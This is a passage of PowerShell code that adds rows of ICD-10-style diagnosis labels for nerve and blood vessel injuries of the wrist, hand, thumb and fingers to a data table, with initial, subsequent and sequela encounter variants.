$DiagnosisList.Rows.Add("Injury of digital nerve of unspecified thumb","Injury of digital nerve of unspecified thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of digital nerve of unspecified thumb","Injury of digital nerve of unspecified thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of digital nerve of unspecified thumb","Injury of digital nerve of unspecified thumb, sequela") + $null = $DiagnosisList.Rows.Add("Injury of digital nerve of right thumb","Injury of digital nerve of right thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of digital nerve of right thumb","Injury of digital nerve of right thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of digital nerve of right thumb","Injury of digital nerve of right thumb, sequela") + $null = $DiagnosisList.Rows.Add("Injury of digital nerve of left thumb","Injury of digital nerve of left thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of digital nerve of left thumb","Injury of digital nerve of left thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of digital nerve of left thumb","Injury of digital nerve of left thumb, sequela") + $null = $DiagnosisList.Rows.Add("Injury of digital nerve of unspecified finger","Injury of digital nerve of unspecified finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of digital nerve of unspecified finger","Injury of digital nerve of unspecified finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of digital nerve of unspecified finger","Injury of digital nerve of unspecified finger, sequela") + $null = $DiagnosisList.Rows.Add("Injury of digital nerve of right index finger","Injury of digital nerve of right index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of digital nerve of right index finger","Injury of digital nerve of right index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of digital nerve of right index finger","Injury of digital nerve of right index finger, sequela") + $null = $DiagnosisList.Rows.Add("Injury of digital nerve of left index finger","Injury of digital nerve of left index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of digital nerve of left index finger","Injury of digital nerve of left index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of digital nerve of left index finger","Injury of digital nerve of left index finger, sequela") + $null = $DiagnosisList.Rows.Add("Injury of digital nerve of right middle finger","Injury of digital nerve of right middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of digital nerve of right middle finger","Injury of digital nerve of right middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of digital nerve of right middle finger","Injury of digital nerve of right middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Injury of digital nerve of left middle finger","Injury of digital nerve of left middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of digital nerve of left middle finger","Injury of digital nerve of left middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of digital nerve of left middle finger","Injury of digital nerve of left middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Injury of digital nerve of right ring finger","Injury of digital nerve of right ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of digital nerve of right ring finger","Injury of digital nerve of right ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of digital nerve of right ring finger","Injury of digital nerve of right ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Injury of digital nerve of left ring finger","Injury of digital nerve of left ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of digital nerve of left ring finger","Injury of digital nerve of left ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of digital nerve of left ring finger","Injury of digital nerve of left ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Injury of digital nerve of right little finger","Injury of digital nerve of right little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of digital nerve of right little finger","Injury of digital nerve of right little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of digital nerve of right little finger","Injury of digital nerve of right little finger, sequela") + $null = $DiagnosisList.Rows.Add("Injury of digital nerve of left little finger","Injury of digital nerve of left little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of digital nerve of left little finger","Injury of digital nerve of left little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of digital nerve of left little finger","Injury of digital nerve of left little finger, sequela") + $null = $DiagnosisList.Rows.Add("Injury of digital nerve of other finger","Injury of digital nerve of other finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of digital nerve of other finger","Injury of digital nerve of other finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of digital nerve of other finger","Injury of digital nerve of other finger, sequela") + $null = $DiagnosisList.Rows.Add("Injury of other nerves at wrist and hand level of right arm","Injury of other nerves at wrist and hand level of right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of other nerves at wrist and hand level of right arm","Injury of other nerves at wrist and hand level of right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of other nerves at wrist and hand level of right arm","Injury of other nerves at wrist and hand level of right arm, sequela") + $null = $DiagnosisList.Rows.Add("Injury of other nerves at wrist and hand level of left arm","Injury of other nerves at wrist and hand level of left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of other nerves at wrist and hand level of left arm","Injury of other nerves at wrist and hand level of left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of other nerves at wrist and hand level of left arm","Injury of other nerves at wrist and hand level of left arm, sequela") + $null = $DiagnosisList.Rows.Add("Injury of other nerves at wrist and hand level of unspecified arm","Injury of other nerves at wrist and hand level of unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of other nerves at wrist and hand level of unspecified arm","Injury of other nerves at wrist and hand level of unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of other nerves at wrist and hand level of unspecified arm","Injury of other nerves at wrist and hand level of unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerve at wrist and hand level of unspecified arm","Injury of unspecified nerve at wrist and hand level of unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerve at wrist and hand level of unspecified arm","Injury of unspecified nerve at wrist and hand level of unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerve at wrist and hand level of unspecified arm","Injury of unspecified nerve at wrist and hand level of unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerve at wrist and hand level of right arm","Injury of unspecified nerve at wrist and hand level of right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerve at wrist and hand level of right arm","Injury of unspecified nerve at wrist and hand level of right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerve at wrist and hand level of right arm","Injury of unspecified nerve at wrist and hand level of right arm, sequela") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerve at wrist and hand level of left arm","Injury of unspecified nerve at wrist and hand level of left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerve at wrist and hand level of left arm","Injury of unspecified nerve at wrist and hand level of left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerve at wrist and hand level of left arm","Injury of unspecified nerve at wrist and hand level of left arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of ulnar artery at wrist and hand level of right arm","Unspecified injury of ulnar artery at wrist and hand level of right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of ulnar artery at wrist and hand level of right arm","Unspecified injury of ulnar artery at wrist and hand level of right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of ulnar artery at wrist and hand level of right arm","Unspecified injury of ulnar artery at wrist and hand level of right arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of ulnar artery at wrist and hand level of left arm","Unspecified injury of ulnar artery at wrist and hand level of left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of ulnar artery at wrist and hand level of left arm","Unspecified injury of ulnar artery at wrist and hand level of left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of ulnar artery at wrist and hand level of left arm","Unspecified injury of ulnar artery at wrist and hand level of left arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of ulnar artery at wrist and hand level of unspecified arm","Unspecified injury of ulnar artery at wrist and hand level of unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of ulnar artery at wrist and hand level of unspecified arm","Unspecified injury of ulnar artery at wrist and hand level of unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of ulnar artery at wrist and hand level of unspecified arm","Unspecified injury of ulnar artery at wrist and hand level of unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of ulnar artery at wrist and hand level of right arm","Laceration of ulnar artery at wrist and hand level of right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of ulnar artery at wrist and hand level of right arm","Laceration of ulnar artery at wrist and hand level of right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of ulnar artery at wrist and hand level of right arm","Laceration of ulnar artery at wrist and hand level of right arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of ulnar artery at wrist and hand level of left arm","Laceration of ulnar artery at wrist and hand level of left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of ulnar artery at wrist and hand level of left arm","Laceration of ulnar artery at wrist and hand level of left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of ulnar artery at wrist and hand level of left arm","Laceration of ulnar artery at wrist and hand level of left arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of ulnar artery at wrist and hand level of unspecified arm","Laceration of ulnar artery at wrist and hand level of unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of ulnar artery at wrist and hand level of unspecified arm","Laceration of ulnar artery at wrist and hand level of unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of ulnar artery at wrist and hand level of unspecified arm","Laceration of ulnar artery at wrist and hand level of unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of ulnar artery at wrist and hand level of right arm","Other specified injury of ulnar artery at wrist and hand level of right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of ulnar artery at wrist and hand level of right arm","Other specified injury of ulnar artery at wrist and hand level of right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of ulnar artery at wrist and hand level of right arm","Other specified injury of ulnar artery at wrist and hand level of right arm, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of ulnar artery at wrist and hand level of left arm","Other specified injury of ulnar artery at wrist and hand level of left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of ulnar artery at wrist and hand level of left arm","Other specified injury of ulnar artery at wrist and hand level of left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of ulnar artery at wrist and hand level of left arm","Other specified injury of ulnar artery at wrist and hand level of left arm, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of ulnar artery at wrist and hand level of unspecified arm","Other specified injury of ulnar artery at wrist and hand level of unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of ulnar artery at wrist and hand level of unspecified arm","Other specified injury of ulnar artery at wrist and hand level of unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of ulnar artery at wrist and hand level of unspecified arm","Other specified injury of ulnar artery at wrist and hand level of unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of radial artery at wrist and hand level of right arm","Unspecified injury of radial artery at wrist and hand level of right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of radial artery at wrist and hand level of right arm","Unspecified injury of radial artery at wrist and hand level of right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of radial artery at wrist and hand level of right arm","Unspecified injury of radial artery at wrist and hand level of right arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of radial artery at wrist and hand level of left arm","Unspecified injury of radial artery at wrist and hand level of left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of radial artery at wrist and hand level of left arm","Unspecified injury of radial artery at wrist and hand level of left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of radial artery at wrist and hand level of left arm","Unspecified injury of radial artery at wrist and hand level of left arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of radial artery at wrist and hand level of unspecified arm","Unspecified injury of radial artery at wrist and hand level of unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of radial artery at wrist and hand level of unspecified arm","Unspecified injury of radial artery at wrist and hand level of unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of radial artery at wrist and hand level of unspecified arm","Unspecified injury of radial artery at wrist and hand level of unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of radial artery at wrist and hand level of right arm","Laceration of radial artery at wrist and hand level of right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of radial artery at wrist and hand level of right arm","Laceration of radial artery at wrist and hand level of right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of radial artery at wrist and hand level of right arm","Laceration of radial artery at wrist and hand level of right arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of radial artery at wrist and hand level of left arm","Laceration of radial artery at wrist and hand level of left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of radial artery at wrist and hand level of left arm","Laceration of radial artery at wrist and hand level of left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of radial artery at wrist and hand level of left arm","Laceration of radial artery at wrist and hand level of left arm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of radial artery at wrist and hand level of unspecified arm","Laceration of radial artery at wrist and hand level of unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of radial artery at wrist and hand level of unspecified arm","Laceration of radial artery at wrist and hand level of unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of radial artery at wrist and hand level of unspecified arm","Laceration of radial artery at wrist and hand level of unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of radial artery at wrist and hand level of right arm","Other specified injury of radial artery at wrist and hand level of right arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of radial artery at wrist and hand level of right arm","Other specified injury of radial artery at wrist and hand level of right arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of radial artery at wrist and hand level of right arm","Other specified injury of radial artery at wrist and hand level of right arm, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of radial artery at wrist and hand level of left arm","Other specified injury of radial artery at wrist and hand level of left arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of radial artery at wrist and hand level of left arm","Other specified injury of radial artery at wrist and hand level of left arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of radial artery at wrist and hand level of left arm","Other specified injury of radial artery at wrist and hand level of left arm, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of radial artery at wrist and hand level of unspecified arm","Other specified injury of radial artery at wrist and hand level of unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of radial artery at wrist and hand level of unspecified arm","Other specified injury of radial artery at wrist and hand level of unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of radial artery at wrist and hand level of unspecified arm","Other specified injury of radial artery at wrist and hand level of unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of superficial palmar arch of right hand","Unspecified injury of superficial palmar arch of right hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of superficial palmar arch of right hand","Unspecified injury of superficial palmar arch of right hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of superficial palmar arch of right hand","Unspecified injury of superficial palmar arch of right hand, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of superficial palmar arch of left hand","Unspecified injury of superficial palmar arch of left hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of superficial palmar arch of left hand","Unspecified injury of superficial palmar arch of left hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of superficial palmar arch of left hand","Unspecified injury of superficial palmar arch of left hand, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of superficial palmar arch of unspecified hand","Unspecified injury of superficial palmar arch of unspecified hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of superficial palmar arch of unspecified hand","Unspecified injury of superficial palmar arch of unspecified hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of superficial palmar arch of unspecified hand","Unspecified injury of superficial palmar arch of unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of superficial palmar arch of right hand","Laceration of superficial palmar arch of right hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of superficial palmar arch of right hand","Laceration of superficial palmar arch of right hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of superficial palmar arch of right hand","Laceration of superficial palmar arch of right hand, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of superficial palmar arch of left hand","Laceration of superficial palmar arch of left hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of superficial palmar arch of left hand","Laceration of superficial palmar arch of left hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of superficial palmar arch of left hand","Laceration of superficial palmar arch of left hand, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of superficial palmar arch of unspecified hand","Laceration of superficial palmar arch of unspecified hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of superficial palmar arch of unspecified hand","Laceration of superficial palmar arch of unspecified hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of superficial palmar arch of unspecified hand","Laceration of superficial palmar arch of unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of superficial palmar arch of right hand","Other specified injury of superficial palmar arch of right hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of superficial palmar arch of right hand","Other specified injury of superficial palmar arch of right hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of superficial palmar arch of right hand","Other specified injury of superficial palmar arch of right hand, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of superficial palmar arch of left hand","Other specified injury of superficial palmar arch of left hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of superficial palmar arch of left hand","Other specified injury of superficial palmar arch of left hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of superficial palmar arch of left hand","Other specified injury of superficial palmar arch of left hand, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of superficial palmar arch of unspecified hand","Other specified injury of superficial palmar arch of unspecified hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of superficial palmar arch of unspecified hand","Other specified injury of superficial palmar arch of unspecified hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of superficial palmar arch of unspecified hand","Other specified injury of superficial palmar arch of unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of deep palmar arch of right hand","Unspecified injury of deep palmar arch of right hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of deep palmar arch of right hand","Unspecified injury of deep palmar arch of right hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of deep palmar arch of right hand","Unspecified injury of deep palmar arch of right hand, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of deep palmar arch of left hand","Unspecified injury of deep palmar arch of left hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of deep palmar arch of left hand","Unspecified injury of deep palmar arch of left hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of deep palmar arch of left hand","Unspecified injury of deep palmar arch of left hand, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of deep palmar arch of unspecified hand","Unspecified injury of deep palmar arch of unspecified hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of deep palmar arch of unspecified hand","Unspecified injury of deep palmar arch of unspecified hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of deep palmar arch of unspecified hand","Unspecified injury of deep palmar arch of unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of deep palmar arch of right hand","Laceration of deep palmar arch of right hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of deep palmar arch of right hand","Laceration of deep palmar arch of right hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of deep palmar arch of right hand","Laceration of deep palmar arch of right hand, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of deep palmar arch of left hand","Laceration of deep palmar arch of left hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of deep palmar arch of left hand","Laceration of deep palmar arch of left hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of deep palmar arch of left hand","Laceration of deep palmar arch of left hand, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of deep palmar arch of unspecified hand","Laceration of deep palmar arch of unspecified hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of deep palmar arch of unspecified hand","Laceration of deep palmar arch of unspecified hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of deep palmar arch of unspecified hand","Laceration of deep palmar arch of unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of deep palmar arch of right hand","Other specified injury of deep palmar arch of right hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of deep palmar arch of right hand","Other specified injury of deep palmar arch of right hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of deep palmar arch of right hand","Other specified injury of deep palmar arch of right hand, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of deep palmar arch of left hand","Other specified injury of deep palmar arch of left hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of deep palmar arch of left hand","Other specified injury of deep palmar arch of left hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of deep palmar arch of left hand","Other specified injury of deep palmar arch of left hand, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of deep palmar arch of unspecified hand","Other specified injury of deep palmar arch of unspecified hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of deep palmar arch of unspecified hand","Other specified injury of deep palmar arch of unspecified hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of deep palmar arch of unspecified hand","Other specified injury of deep palmar arch of unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of blood vessel of right thumb","Unspecified injury of blood vessel of right thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of blood vessel of right thumb","Unspecified injury of blood vessel of right thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of blood vessel of right thumb","Unspecified injury of blood vessel of right thumb, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of blood vessel of left thumb","Unspecified injury of blood vessel of left thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of blood vessel of left thumb","Unspecified injury of blood vessel of left thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of blood vessel of left thumb","Unspecified injury of blood vessel of left thumb, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of blood vessel of unspecified thumb","Unspecified injury of blood vessel of unspecified thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of blood vessel of unspecified thumb","Unspecified injury of blood vessel of unspecified thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of blood vessel of unspecified thumb","Unspecified injury of blood vessel of unspecified thumb, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of blood vessel of right thumb","Laceration of blood vessel of right thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of blood vessel of right thumb","Laceration of blood vessel of right thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of blood vessel of right thumb","Laceration of blood vessel of right thumb, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of blood vessel of left thumb","Laceration of blood vessel of left thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of blood vessel of left thumb","Laceration of blood vessel of left thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of blood vessel of left thumb","Laceration of blood vessel of left thumb, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of blood vessel of unspecified thumb","Laceration of blood vessel of unspecified thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of blood vessel of unspecified thumb","Laceration of blood vessel of unspecified thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of blood vessel of unspecified thumb","Laceration of blood vessel of unspecified thumb, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of blood vessel of right thumb","Other specified injury of blood vessel of right thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of blood vessel of right thumb","Other specified injury of blood vessel of right thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of blood vessel of right thumb","Other specified injury of blood vessel of right thumb, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of blood vessel of left thumb","Other specified injury of blood vessel of left thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of blood vessel of left thumb","Other specified injury of blood vessel of left thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of blood vessel of left thumb","Other specified injury of blood vessel of left thumb, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of blood vessel of unspecified thumb","Other specified injury of blood vessel of unspecified thumb, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of blood vessel of unspecified thumb","Other specified injury of blood vessel of unspecified thumb, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of blood vessel of unspecified thumb","Other specified injury of blood vessel of unspecified thumb, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of blood vessel of right index finger","Unspecified injury of blood vessel of right index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of blood vessel of right index finger","Unspecified injury of blood vessel of right index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of blood vessel of right index finger","Unspecified injury of blood vessel of right index finger, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of blood vessel of left index finger","Unspecified injury of blood vessel of left index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of blood vessel of left index finger","Unspecified injury of blood vessel of left index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of blood vessel of left index finger","Unspecified injury of blood vessel of left index finger, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of blood vessel of right middle finger","Unspecified injury of blood vessel of right middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of blood vessel of right middle finger","Unspecified injury of blood vessel of right middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of blood vessel of right middle finger","Unspecified injury of blood vessel of right middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of blood vessel of left middle finger","Unspecified injury of blood vessel of left middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of blood vessel of left middle finger","Unspecified injury of blood vessel of left middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of blood vessel of left middle finger","Unspecified injury of blood vessel of left middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of blood vessel of right ring finger","Unspecified injury of blood vessel of right ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of blood vessel of right ring finger","Unspecified injury of blood vessel of right ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of blood vessel of right ring finger","Unspecified injury of blood vessel of right ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of blood vessel of left ring finger","Unspecified injury of blood vessel of left ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of blood vessel of left ring finger","Unspecified injury of blood vessel of left ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of blood vessel of left ring finger","Unspecified injury of blood vessel of left ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of blood vessel of right little finger","Unspecified injury of blood vessel of right little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of blood vessel of right little finger","Unspecified injury of blood vessel of right little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of blood vessel of right little finger","Unspecified injury of blood vessel of right little finger, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of blood vessel of left little finger","Unspecified injury of blood vessel of left little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of blood vessel of left little finger","Unspecified injury of blood vessel of left little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of blood vessel of left little finger","Unspecified injury of blood vessel of left little finger, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of blood vessel of other finger","Unspecified injury of blood vessel of other finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of blood vessel of other finger","Unspecified injury of blood vessel of other finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of blood vessel of other finger","Unspecified injury of blood vessel of other finger, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of blood vessel of unspecified finger","Unspecified injury of blood vessel of unspecified finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of blood vessel of unspecified finger","Unspecified injury of blood vessel of unspecified finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of blood vessel of unspecified finger","Unspecified injury of blood vessel of unspecified finger, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of blood vessel of right index 